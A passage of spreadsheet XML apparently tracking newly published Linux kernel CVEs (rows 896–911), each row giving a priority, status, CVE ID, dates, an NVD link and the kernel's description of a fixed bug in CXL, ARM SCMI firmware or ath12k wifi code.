      <c r="N896" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O896" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P896" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q896" s="5" t="inlineStr"/>
      <c r="R896" s="5" t="inlineStr"/>
      <c r="S896" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: Reject Set Features output buffer smaller than the header
cxlctl_set_feature() sizes its output buffer from the user's
fwctl_rpc.out_len but never checks it is large enough to hold even the
fwctl_rpc_cxl_out header. With out_len == 0 , kvzalloc() returns
ZERO_SIZE_PTR, which passes the !rpc_out check, the subsequent
rpc_out-&gt;size = 0 then writes through the poison pointer.
Reject requests whose output buffer can't hold the response header,
before allocating. The Set Feature reply carries no payload, so the
header is all that is required.</t>
        </is>
      </c>
      <c r="T896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93078</t>
        </is>
      </c>
    </row>
    <row r="897">
      <c r="A897" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B897" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93079</t>
        </is>
      </c>
      <c r="D897" s="5" t="inlineStr"/>
      <c r="E897" s="5" t="inlineStr"/>
      <c r="F897" s="5" t="inlineStr"/>
      <c r="G897" s="5" t="inlineStr"/>
      <c r="H897" s="5" t="inlineStr"/>
      <c r="I897" s="5" t="inlineStr"/>
      <c r="J897" s="5" t="inlineStr"/>
      <c r="K897" s="5" t="inlineStr"/>
      <c r="L897" s="5" t="inlineStr"/>
      <c r="M897" s="5" t="inlineStr"/>
      <c r="N897" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O897" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P897" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q897" s="5" t="inlineStr"/>
      <c r="R897" s="5" t="inlineStr"/>
      <c r="S897" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: Reject Get Feature count larger than the output buffer
cxlctl_get_feature() sizes its output buffer from the user's
fwctl_rpc.out_len, but the device is told to write
cxl_mbox_get_feat_in.count bytes into rpc_out-&gt;payload, which is a
separate user-controlled value. Nothing bounds count against out_len, so
a small out_len with a large count overflows the kvzalloc()'d buffer.
A heap OOB write reachable from FWCTL_RPC.
Reject requests where count exceeds the available payload room, before
allocating.</t>
        </is>
      </c>
      <c r="T897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93079</t>
        </is>
      </c>
    </row>
    <row r="898">
      <c r="A898" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B898" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93080</t>
        </is>
      </c>
      <c r="D898" s="5" t="inlineStr"/>
      <c r="E898" s="5" t="inlineStr"/>
      <c r="F898" s="5" t="inlineStr"/>
      <c r="G898" s="5" t="inlineStr"/>
      <c r="H898" s="5" t="inlineStr"/>
      <c r="I898" s="5" t="inlineStr"/>
      <c r="J898" s="5" t="inlineStr"/>
      <c r="K898" s="5" t="inlineStr"/>
      <c r="L898" s="5" t="inlineStr"/>
      <c r="M898" s="5" t="inlineStr"/>
      <c r="N898" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O898" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P898" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q898" s="5" t="inlineStr"/>
      <c r="R898" s="5" t="inlineStr"/>
      <c r="S898" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Fix transport device teardown lookup
SCMI transport devices are deliberately excluded from normal SCMI bus
matching so protocol drivers cannot bind to the internal transport
children. However, scmi_device_destroy() uses the same protocol/name
lookup to find devices that must be unregistered during channel teardown.
Split the match helper so driver matching still skips transport devices,
while explicit child lookup can find them for teardown. Use a shared
transport-device name prefix macro for both matching and name generation.
Since transport-device names are derived from direction and protocol ID,
reject duplicate protocol channel setup before creating or finding a
transport device. This prevents malformed firmware with duplicate
protocol child nodes from reusing an existing transport device and then
destroying it when the duplicate IDR insertion fails.</t>
        </is>
      </c>
      <c r="T898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93080</t>
        </is>
      </c>
    </row>
    <row r="899">
      <c r="A899" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B899" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93081</t>
        </is>
      </c>
      <c r="D899" s="5" t="inlineStr"/>
      <c r="E899" s="5" t="inlineStr"/>
      <c r="F899" s="5" t="inlineStr"/>
      <c r="G899" s="5" t="inlineStr"/>
      <c r="H899" s="5" t="inlineStr"/>
      <c r="I899" s="5" t="inlineStr"/>
      <c r="J899" s="5" t="inlineStr"/>
      <c r="K899" s="5" t="inlineStr"/>
      <c r="L899" s="5" t="inlineStr"/>
      <c r="M899" s="5" t="inlineStr"/>
      <c r="N899" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O899" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P899" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q899" s="5" t="inlineStr"/>
      <c r="R899" s="5" t="inlineStr"/>
      <c r="S899" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Fix SCMI device destroy lifetimes
scmi_child_dev_find() drops the reference returned by
device_find_child() before returning the scmi_device pointer. A
concurrent unregister can then release the device while the destroy path
is still using the returned pointer.
Make the lookup helper return the device_find_child() reference and keep
it until scmi_device_destroy() has finished unregistering the child.
Also split device_unregister() in __scmi_device_destroy() so the SCMI bus
ID is not made reusable until after device_del() has removed the old
scmi_dev.N name from sysfs. This avoids a new SCMI device reusing the
same ID while the old device is still registered.
The final device release callback is also a possible cleanup path when
SCMI children are deleted by driver core recursion rather than
__scmi_device_destroy(). Release the SCMI bus ID from a common helper
used by destroy, register-failure and final-release paths, and clear
scmi_dev-&gt;id after freeing it so the final release cannot free the same
ID again.</t>
        </is>
      </c>
      <c r="T899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93081</t>
        </is>
      </c>
    </row>
    <row r="900">
      <c r="A900" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B900" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93082</t>
        </is>
      </c>
      <c r="D900" s="5" t="inlineStr"/>
      <c r="E900" s="5" t="inlineStr"/>
      <c r="F900" s="5" t="inlineStr"/>
      <c r="G900" s="5" t="inlineStr"/>
      <c r="H900" s="5" t="inlineStr"/>
      <c r="I900" s="5" t="inlineStr"/>
      <c r="J900" s="5" t="inlineStr"/>
      <c r="K900" s="5" t="inlineStr"/>
      <c r="L900" s="5" t="inlineStr"/>
      <c r="M900" s="5" t="inlineStr"/>
      <c r="N900" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O900" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P900" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q900" s="5" t="inlineStr"/>
      <c r="R900" s="5" t="inlineStr"/>
      <c r="S900" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Unwind P2A receiver mailbox setup failure
mailbox_chan_setup() can request an additional P2A receiver channel after
successfully acquiring the primary P2A channel. If that later request
fails, the function returns immediately and leaves the primary channel
allocated.
Unwind the primary mailbox channel before returning the error so probe
deferral or other setup failures do not leave the channel busy for later
probe attempts.</t>
        </is>
      </c>
      <c r="T900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93082</t>
        </is>
      </c>
    </row>
    <row r="901">
      <c r="A901" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B901" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93083</t>
        </is>
      </c>
      <c r="D901" s="5" t="inlineStr"/>
      <c r="E901" s="5" t="inlineStr"/>
      <c r="F901" s="5" t="inlineStr"/>
      <c r="G901" s="5" t="inlineStr"/>
      <c r="H901" s="5" t="inlineStr"/>
      <c r="I901" s="5" t="inlineStr"/>
      <c r="J901" s="5" t="inlineStr"/>
      <c r="K901" s="5" t="inlineStr"/>
      <c r="L901" s="5" t="inlineStr"/>
      <c r="M901" s="5" t="inlineStr"/>
      <c r="N901" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O901" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P901" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q901" s="5" t="inlineStr"/>
      <c r="R901" s="5" t="inlineStr"/>
      <c r="S901" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Unwind TX receiver mailbox setup failure
mailbox_chan_setup() can request an additional unidirectional TX
receiver channel after successfully acquiring the primary channel. If
that second request fails, the function returns immediately and leaves
the primary channel allocated.
Unwind the primary mailbox channel before returning the error so probe
deferral or other setup failures do not leave the channel busy for later
probe attempts.</t>
        </is>
      </c>
      <c r="T901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93083</t>
        </is>
      </c>
    </row>
    <row r="902">
      <c r="A902" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B902" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93084</t>
        </is>
      </c>
      <c r="D902" s="5" t="inlineStr"/>
      <c r="E902" s="5" t="inlineStr"/>
      <c r="F902" s="5" t="inlineStr"/>
      <c r="G902" s="5" t="inlineStr"/>
      <c r="H902" s="5" t="inlineStr"/>
      <c r="I902" s="5" t="inlineStr"/>
      <c r="J902" s="5" t="inlineStr"/>
      <c r="K902" s="5" t="inlineStr"/>
      <c r="L902" s="5" t="inlineStr"/>
      <c r="M902" s="5" t="inlineStr"/>
      <c r="N902" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O902" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P902" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q902" s="5" t="inlineStr"/>
      <c r="R902" s="5" t="inlineStr"/>
      <c r="S902" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Drop handle on protocol bind failures
The SCMI bus notifier acquires an SCMI handle when the driver core emits
BUS_NOTIFY_BIND_DRIVER, before invoking the protocol driver probe
callback. The protocol probe path only checks whether sdev-&gt;handle is
set.
If device_link_add() fails after the handle has been acquired, the
protocol device can still bind with a valid handle but without the
dependency link to the SCMI parent. A concurrent parent unbind can then
miss the child and tear down the SCMI instance while the child still
holds a handle into it.
If the protocol driver probe later fails, for example with
-EPROBE_DEFER, the driver core emits BUS_NOTIFY_DRIVER_NOT_BOUND rather
than BUS_NOTIFY_UNBOUND_DRIVER. The SCMI notifier only released the
handle on BUS_NOTIFY_UNBOUND_DRIVER, so each failed protocol-device bind
leaked the SCMI instance users refcount and left sdev-&gt;handle set after
the failed probe.
Make the link helper report failure and drop the acquired handle if the
link cannot be created. Also handle BUS_NOTIFY_DRIVER_NOT_BOUND in the
same cleanup path used for unbind so failed probes balance the earlier
BUS_NOTIFY_BIND_DRIVER acquisition.</t>
        </is>
      </c>
      <c r="T902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93084</t>
        </is>
      </c>
    </row>
    <row r="903">
      <c r="A903" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B903" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93085</t>
        </is>
      </c>
      <c r="D903" s="5" t="inlineStr"/>
      <c r="E903" s="5" t="inlineStr"/>
      <c r="F903" s="5" t="inlineStr"/>
      <c r="G903" s="5" t="inlineStr"/>
      <c r="H903" s="5" t="inlineStr"/>
      <c r="I903" s="5" t="inlineStr"/>
      <c r="J903" s="5" t="inlineStr"/>
      <c r="K903" s="5" t="inlineStr"/>
      <c r="L903" s="5" t="inlineStr"/>
      <c r="M903" s="5" t="inlineStr"/>
      <c r="N903" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O903" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P903" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q903" s="5" t="inlineStr"/>
      <c r="R903" s="5" t="inlineStr"/>
      <c r="S903" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Reject out of range DT protocol IDs
SCMI protocol IDs carried in message headers are limited by
MSG_PROTOCOL_ID_MASK. The DT parsing paths noticed protocol IDs
outside that range, but only logged an error and then kept processing
the invalid value.
That lets a malformed 32-bit DT reg value reach helpers which take a u8
protocol ID, where it can be truncated and/or treated as a different
protocol.
For channel setup, two different out-of-range values can also be used as
distinct IDR keys while aliasing the generated SCMI protocol identity.
Skip DT protocol nodes whose reg value does not fit the SCMI protocol ID
field before setting up channels or creating protocol devices.</t>
        </is>
      </c>
      <c r="T903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93085</t>
        </is>
      </c>
    </row>
    <row r="904">
      <c r="A904" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B904" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93086</t>
        </is>
      </c>
      <c r="D904" s="5" t="inlineStr"/>
      <c r="E904" s="5" t="inlineStr"/>
      <c r="F904" s="5" t="inlineStr"/>
      <c r="G904" s="5" t="inlineStr"/>
      <c r="H904" s="5" t="inlineStr"/>
      <c r="I904" s="5" t="inlineStr"/>
      <c r="J904" s="5" t="inlineStr"/>
      <c r="K904" s="5" t="inlineStr"/>
      <c r="L904" s="5" t="inlineStr"/>
      <c r="M904" s="5" t="inlineStr"/>
      <c r="N904" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O904" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P904" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q904" s="5" t="inlineStr"/>
      <c r="R904" s="5" t="inlineStr"/>
      <c r="S904" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Avoid IDR updates while cleaning channels
scmi_cleanup_channels() walks the TX/RX channel IDRs with
idr_for_each() to free transport resources and destroy the dedicated
transport devices before calling idr_destroy().
The destroy callback removed each entry from the same IDR being walked.
That is not needed for this cleanup path, and it is unsafe because
idr_for_each() has not advanced its radix-tree iterator while the
callback is running. Removing the current entry from the callback can
invalidate the iterator state. The callback also cannot be protected by
rcu_read_lock(), because scmi_device_destroy() may sleep.
Leave IDR teardown to the following idr_destroy() call and keep the
callback limited to device destruction.</t>
        </is>
      </c>
      <c r="T904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93086</t>
        </is>
      </c>
    </row>
    <row r="905">
      <c r="A905" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B905" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93089</t>
        </is>
      </c>
      <c r="D905" s="5" t="inlineStr"/>
      <c r="E905" s="5" t="inlineStr"/>
      <c r="F905" s="5" t="inlineStr"/>
      <c r="G905" s="5" t="inlineStr"/>
      <c r="H905" s="5" t="inlineStr"/>
      <c r="I905" s="5" t="inlineStr"/>
      <c r="J905" s="5" t="inlineStr"/>
      <c r="K905" s="5" t="inlineStr"/>
      <c r="L905" s="5" t="inlineStr"/>
      <c r="M905" s="5" t="inlineStr"/>
      <c r="N905" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O905" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P905" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q905" s="5" t="inlineStr"/>
      <c r="R905" s="5" t="inlineStr"/>
      <c r="S905" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Free transport channel on IDR failure
If transport channel setup succeeds but the following IDR insertion fails,
the error path destroys the transport device and frees the channel info
without invoking the transport cleanup callback.
Call chan_free() before destroying the device so transport specific
resources such as IRQs, mailbox channels and mapped shared memory are
released consistently with the normal teardown path.</t>
        </is>
      </c>
      <c r="T905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93089</t>
        </is>
      </c>
    </row>
    <row r="906">
      <c r="A906" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B906" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93090</t>
        </is>
      </c>
      <c r="D906" s="5" t="inlineStr"/>
      <c r="E906" s="5" t="inlineStr"/>
      <c r="F906" s="5" t="inlineStr"/>
      <c r="G906" s="5" t="inlineStr"/>
      <c r="H906" s="5" t="inlineStr"/>
      <c r="I906" s="5" t="inlineStr"/>
      <c r="J906" s="5" t="inlineStr"/>
      <c r="K906" s="5" t="inlineStr"/>
      <c r="L906" s="5" t="inlineStr"/>
      <c r="M906" s="5" t="inlineStr"/>
      <c r="N906" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O906" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P906" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q906" s="5" t="inlineStr"/>
      <c r="R906" s="5" t="inlineStr"/>
      <c r="S906" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Clean up channels on setup failure
scmi_channels_setup() can fail after the common BASE channel or earlier
protocol channels have already been registered in the TX/RX IDRs.
Route this failure through the existing channel cleanup label so the
transport channels, transport devices and IDR state created before the
failure are released before the probe error path frees the SCMI instance
ID.</t>
        </is>
      </c>
      <c r="T906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93090</t>
        </is>
      </c>
    </row>
    <row r="907">
      <c r="A907" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B907" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93091</t>
        </is>
      </c>
      <c r="D907" s="5" t="inlineStr"/>
      <c r="E907" s="5" t="inlineStr"/>
      <c r="F907" s="5" t="inlineStr"/>
      <c r="G907" s="5" t="inlineStr"/>
      <c r="H907" s="5" t="inlineStr"/>
      <c r="I907" s="5" t="inlineStr"/>
      <c r="J907" s="5" t="inlineStr"/>
      <c r="K907" s="5" t="inlineStr"/>
      <c r="L907" s="5" t="inlineStr"/>
      <c r="M907" s="5" t="inlineStr"/>
      <c r="N907" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O907" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P907" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q907" s="5" t="inlineStr"/>
      <c r="R907" s="5" t="inlineStr"/>
      <c r="S907" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Quiesce notifications before teardown
scmi_notification_exit() clears and releases the notification instance,
but transport callbacks can still deliver incoming notifications until
the TX/RX channels are freed. During remove, an RX interrupt in that
window can enter scmi_notify() while notification state is being torn
down and then dereference freed memory. The same ordering exists on the
probe error path after notification initialization.
The notification late-init worker has a separate lifetime issue: protocol
event registration queues ni-&gt;init_work on the system workqueue, so
destroying ni-&gt;notify_wq does not drain that work. If the devres group is
released while init_work is still pending or running, the late-init worker
can dereference the freed notification instance.
Quiesce the notification core before TX/RX channels are torn down, then
clean up the channels before releasing the notification core resources.
Use disable_work_sync() so future late-init queueing is rejected and any
already queued or running late-init work has completed before channel
teardown starts.</t>
        </is>
      </c>
      <c r="T907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93091</t>
        </is>
      </c>
    </row>
    <row r="908">
      <c r="A908" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B908" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93092</t>
        </is>
      </c>
      <c r="D908" s="5" t="inlineStr"/>
      <c r="E908" s="5" t="inlineStr"/>
      <c r="F908" s="5" t="inlineStr"/>
      <c r="G908" s="5" t="inlineStr"/>
      <c r="H908" s="5" t="inlineStr"/>
      <c r="I908" s="5" t="inlineStr"/>
      <c r="J908" s="5" t="inlineStr"/>
      <c r="K908" s="5" t="inlineStr"/>
      <c r="L908" s="5" t="inlineStr"/>
      <c r="M908" s="5" t="inlineStr"/>
      <c r="N908" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O908" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P908" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q908" s="5" t="inlineStr"/>
      <c r="R908" s="5" t="inlineStr"/>
      <c r="S908" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Unregister device notifier before IDR teardown
The requested-devices notifier looks up protocol fwnodes from the
active_protocols IDR. During remove, unregister the notifier before
releasing and destroying active_protocols so no notifier callback can race
with the IDR teardown.
Keep the bus notifier registered until after the protocol state is torn
down, matching the existing remove ordering for SCMI bus users.</t>
        </is>
      </c>
      <c r="T908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93092</t>
        </is>
      </c>
    </row>
    <row r="909">
      <c r="A909" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B909" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93093</t>
        </is>
      </c>
      <c r="D909" s="5" t="inlineStr"/>
      <c r="E909" s="5" t="inlineStr"/>
      <c r="F909" s="5" t="inlineStr"/>
      <c r="G909" s="5" t="inlineStr"/>
      <c r="H909" s="5" t="inlineStr"/>
      <c r="I909" s="5" t="inlineStr"/>
      <c r="J909" s="5" t="inlineStr"/>
      <c r="K909" s="5" t="inlineStr"/>
      <c r="L909" s="5" t="inlineStr"/>
      <c r="M909" s="5" t="inlineStr"/>
      <c r="N909" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O909" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P909" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q909" s="5" t="inlineStr"/>
      <c r="R909" s="5" t="inlineStr"/>
      <c r="S909" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: arm_scmi: Publish channel state before callbacks
Transport setup can enable callbacks before the setup routine returns.
mailbox_chan_setup() registers the mailbox client with
mbox_request_channel(), and the mailbox controller startup path can enable
interrupt delivery before SCMI mailbox channel state has been published.
Similarly, smc_chan_setup() requests the optional A2P completion IRQ before
the SMC transport has made its cinfo pointer visible.
If a pending or spurious callback fires in those windows, the transport RX
callback can dereference a NULL transport cinfo pointer. Publishing only
the transport-private pointer is not sufficient either: an early callback
can enter the SCMI core before scmi_chan_setup() has assigned
cinfo-&gt;handle.
The core derives scmi_info from cinfo-&gt;handle in the RX path, so a NULL
handle can still fault even when the transport-private cinfo is valid.
Assign cinfo-&gt;handle before invoking the transport setup callback. Publish
the mailbox and SMC transport-private channel state before requesting the
mailbox channels or IRQ, and clear the early-published pointers again on
setup failure. Also unwind mailbox setup devres resources on failure so an
optional RX setup error that is ignored by the core does not leave stale
transport state behind.</t>
        </is>
      </c>
      <c r="T909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93093</t>
        </is>
      </c>
    </row>
    <row r="910">
      <c r="A910" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B910" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93094</t>
        </is>
      </c>
      <c r="D910" s="5" t="inlineStr"/>
      <c r="E910" s="5" t="inlineStr"/>
      <c r="F910" s="5" t="inlineStr"/>
      <c r="G910" s="5" t="inlineStr"/>
      <c r="H910" s="5" t="inlineStr"/>
      <c r="I910" s="5" t="inlineStr"/>
      <c r="J910" s="5" t="inlineStr"/>
      <c r="K910" s="5" t="inlineStr"/>
      <c r="L910" s="5" t="inlineStr"/>
      <c r="M910" s="5" t="inlineStr"/>
      <c r="N910" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O910" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P910" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q910" s="5" t="inlineStr"/>
      <c r="R910" s="5" t="inlineStr"/>
      <c r="S910" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath12k: fix dp_link_peer dangling references on AP vdev rollback
ath12k_mac_vdev_create() for an AP vdev creates the bss self-peer via
ath12k_peer_create(), which finishes by calling
ath12k_dp_link_peer_assign() to publish the dp_link_peer in the
dp_hw-&gt;dp_peers[peerid_index] RCU table, in the dp_peer's
link_peers[] array, and in the per-addr rhashtable.
If a step after ath12k_peer_create() fails the function jumps to
err_peer_del, which open-codes a WMI peer_delete and waits for the
unmap / delete_resp events. The wait_for_peer_delete_done() path
relies on ath12k_dp_link_peer_unmap_event() freeing the dp_link_peer
when the unmap arrives, but err_peer_del never calls
ath12k_dp_link_peer_unassign() first. The published references in
the dp_hw RCU table, dp_peer-&gt;link_peers[] and the rhashtable are
left pointing at the dp_link_peer that unmap_event then frees,
producing dangling pointers and use-after-free on subsequent
lookups.
Replace the open-coded sequence with a call to ath12k_peer_delete(),
which already does ath12k_dp_link_peer_unassign() before sending the
WMI command. This drops the published references before the
dp_link_peer is freed, in the same order as the normal teardown path
in ath12k_mac_remove_link_interface().
Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.1.c7-00108-QCAHMTSWPL_V1.0_V2.0_SILICONZ_UPSTREAM-3</t>
        </is>
      </c>
      <c r="T910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93094</t>
        </is>
      </c>
    </row>
    <row r="911">
      <c r="A911" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B911" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93095</t>
        </is>
      </c>
      <c r="D911" s="5" t="inlineStr"/>
      <c r="E911" s="5" t="inlineStr"/>
      <c r="F911" s="5" t="inlineStr"/>
      <c r="G911" s="5" t="inlineStr"/>
